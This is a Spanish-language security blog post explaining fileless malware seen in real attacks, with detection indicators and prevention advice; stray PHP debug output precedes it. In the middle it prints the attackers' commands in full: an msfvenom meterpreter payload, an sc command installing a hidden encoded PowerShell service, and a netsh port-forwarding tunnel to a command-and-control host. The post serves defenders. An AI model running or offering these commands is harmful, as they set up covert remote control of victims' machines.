string(14) "attribute >>>>" array(0) { }

Malware casi invisible: infección y detección

string(14) "attribute >>>>" array(5) { ["width"]=> int(600) ["height"]=> int(662) ["file"]=> string(34) "2017/02/Captura-e1487610064347.png" ["sizes"]=> array(4) { ["thumbnail"]=> array(4) { ["file"]=> string(19) "Captura-150x150.png" ["width"]=> int(150) ["height"]=> int(150) ["mime-type"]=> string(9) "image/png" } ["medium"]=> array(4) { ["file"]=> string(19) "Captura-272x300.png" ["width"]=> int(272) ["height"]=> int(300) ["mime-type"]=> string(9) "image/png" } ["medium_large"]=> array(4) { ["file"]=> string(19) "Captura-768x847.png" ["width"]=> int(768) ["height"]=> int(847) ["mime-type"]=> string(9) "image/png" } ["large"]=> array(4) { ["file"]=> string(20) "Captura-928x1024.png" ["width"]=> int(928) ["height"]=> int(1024) ["mime-type"]=> string(9) "image/png" } } ["image_meta"]=> array(12) { ["aperture"]=> string(1) "0" ["credit"]=> string(0) "" ["camera"]=> string(0) "" ["caption"]=> string(0) "" ["created_timestamp"]=> string(1) "0" ["copyright"]=> string(0) "" ["focal_length"]=> string(1) "0" ["iso"]=> string(1) "0" ["shutter_speed"]=> string(1) "0" ["title"]=> string(0) "" ["orientation"]=> string(1) "0" ["keywords"]=> array(0) { } } } array(0) { }
news and informations automotive,business,crime,health,life,politics,science,technology,travelautomotive,business,crime,health,life,politics,science,technology,travel

Hace una semana hablábamos sobre las técnicas que están empezando a utilizar los atacantes para desarrollar malware muy difícil de detectar. Este tipo de malware suele denominarse fileless por el hecho de que no guarda ni modifica archivos en el disco duro y se ejecuta completamente en memoria.

Esta semana ya tenemos algo más de información sobre estas amenazas. El medio de infección aún no está claro, pero podría tratarse de archivos adjuntos de Office con macros que al ejecutarse en la máquina de la víctima hace las veces de dropper que instala el malware en sí. Por sorprendente que nos parezca, aún hay usuarios que aceptan la ejecución de macros en Word cuando se lo pide un archivo que han descargado de alguna web poco fiable o que les ha llegado en un correo electrónico desde un remitente desconocido. Como siempre, el factor humano sigue siendo el eslabón más débil de la cadena de seguridad.

Otra posibilidad que se baraja es el uso de de dominios gratuitos difíciles de rastrear para alojar exploits que aprovechen vulnerabilidades Java o Flash para la infección.

Lo que sí tenemos más claro es el modus operandi que sigue el malware una vez que se ha descargado a la máquina de la víctima. Aquí llama la atención de que, aunque la técnica fileless es bastante novedosa, se utilizan herramientas muy comunes y conocidas por los administradores de sistemas desde hace mucho tiempo para implementarla.

Una de estas herramientas es Metasploit, en la que se ha utilizado la utilidad msfvenom para la creación de un script. Aquí podemos ver msfvenom en funcionamiento:

El comando que se ha utilizado en las máquinas infectadas es:

msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd

Tras la creación del script en Powershell, se utiliza otra conocida herramienta de los sistemas Windows, sc, para instalarlo como un servicio malicioso:

sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual

Para luego utilizar otro comando habitual de la administración de Windows, netsh, para crear túneles que permitan el acceso remoto a la máquina infectada desde el centro de Comando y Control (C&C) del atacante:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080   listenaddress=0.0.0.0

De esta forma, la máquina infectada por el script Powershell estaría bajo el control del atacante. Las IPs que aparecen aquí son las observadas en un ataque concreto, pero podrían ser modificadas para dificultar el rastreo hasta el origen.

Sabemos que el uso de comandos como sc y netsh requiere contar con privilegios de administración en la máquina que se pretende infectar. Se ha descubierto en estas máquinas Mimikatz, que claramente se ha utilizado para obtener las credenciales necesarias. De nuevo, otra herramienta sobradamente conocida.

En las siguiente captura podemos ver parte del volcado de memoria obtenido por los analistas de Kaspersky donde podemos observar que la descarga de meterpreter se hace desde el sitio adobeupdate.sytes.net:

¿Cómo saber si una máquina se ha visto comprometida?

Según el modo de funcionamiento que hemos descrito, podemos detectar una infección si encontramos los siguientes síntomas en una máquina:

Cambios en las siguientes rutas de registro:

HKLM\SYSTEM\ControlSet001\services\

HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp

Que incluirán elementos como:

powershell.exe -nop -w hidden -e
10.10.1.12/8080
10.10.111/4444

Y, por supuesto, la presencia de meterpreter ejecutándose en memoria y la existencia de túneles abiertos en la máquina.

¿Cómo prevenir la infección?

Se podrían utilizar herramientas específicas para detectar los síntomas de esta infección, incluso los antivirus actuales se irán actualizando si no lo han hecho ya, pero como en muchos otros casos, la mejor forma de evitar una amenaza como esta es la formación de los usuarios y el sentido común.

Las aplicaciones como Word, Excel o Powerpoint no van a ejecutar por defecto las macros de los archivos que queremos abrir, sino que nos piden permiso para hacerlo. El problema está en que aún hay usuarios que dan ese permiso a pesar de que el archivo no se ha recibido desde un origen fiable. Solo con evitar la costumbre de responder que sí a todo sin leer los mensajes de advertencia se podrían reducir enormemente las posibilidades de infección.